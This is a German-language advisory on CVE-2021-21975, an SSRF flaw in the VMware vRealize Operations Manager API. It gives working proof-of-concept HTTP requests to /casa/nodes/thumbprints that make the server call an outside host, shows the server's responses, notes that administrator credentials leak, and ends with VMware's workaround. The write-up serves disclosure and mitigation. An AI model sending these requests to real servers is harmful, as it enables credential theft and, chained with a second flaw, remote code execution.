
[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)
[CVE-2021-21975] VMware vRealize Operations Manager API Serverseitige Request-Fälschung (SSRF)
vRealize Operations (vROps) ist ein Tool für selbstfahrendes IT-Betriebsmanagement, das auf KI basiert und von Apps bis zur Infrastruktur reicht, um VMware Cloud- und HCI-Bereitstellungen zu optimieren, zu planen und zu skalieren und gleichzeitig das öffentliche Cloud-Monitoring zu vereinheitlichen. Die VMware vRealize Operations Manager API 8.4 und alle früheren Versionen sind anfällig für eine serverseitige Request-Fälschung (SSRF). Eine erfolgreiche Ausnutzung dieser Schwachstelle kann zum Lesen oder Aktualisieren interner Ressourcen führen; außerdem kann ein Angreifer in diesem Fall leicht administrative Anmeldeinformationen des vROps-Servers stehlen. Durch die Kombination von CVE-2021-21975 und CVE-2021-21983 kann ein Angreifer beliebigen Code auf dem entfernten vRealize Operations-Server ausführen.
Proof of Concept (PoC): Um diese Schwachstelle auszunutzen, können Sie die folgende Anfrage verwenden:
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 70
Connection: close
[
"h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975"
]
Die Antwort auf die obige Anfrage lautet wie folgt:
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 20:59:02 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQB
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 151
[
{
"address": "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975",
"thumbprint": "<html><body>6xal4bz5uui7c8nzvu368ezjlgz</body></html>"
}
]
Außerdem werden administrative Anmeldeinformationen im Authorization-Header offengelegt.
Weitere Proofs of Concept (PoCs): Oder Sie können die folgenden Anfragen verwenden, um die Schwachstelle CVE-2021-21975 VMware vRealize Operations Manager API Serverseitige Request-Fälschung (SSRF) zu erkennen:
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close
[
"78.171.203.41:8000/CVE-2021-21975"
]
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:03 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQE
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 67
[
{
"address":"78.171.203.41:8000/CVE-2021-21975",
"thumbprint":null
}
]
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close
[
"78.171.203.41:8000"
]
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:39 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQJ
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 52
[
{
"address":"78.171.203.41:8000",
"thumbprint":null
}
]
Workaround-Lösung: Falls der Patch nicht installiert werden kann oder es keinen Patch für Ihre Version von vRealize Operations gibt, können die folgenden Schritte zur Problemumgehung durchgeführt werden. Die Anwendung des Workarounds hat keine Auswirkungen auf vRealize Operations.
Gehen Sie wie folgt vor, um dieses Problem in vRealize Operations zu umgehen: Entfernen Sie eine Konfigurationszeile aus casa-security-context.xml
/usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml<sec:http pattern="/nodes/thumbprints" security='none'/>service vmware-casa restartWeitere Informationen finden Sie auf den folgenden Seiten.
https://kb.vmware.com/s/article/83210
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://f5.pm/go-66465.html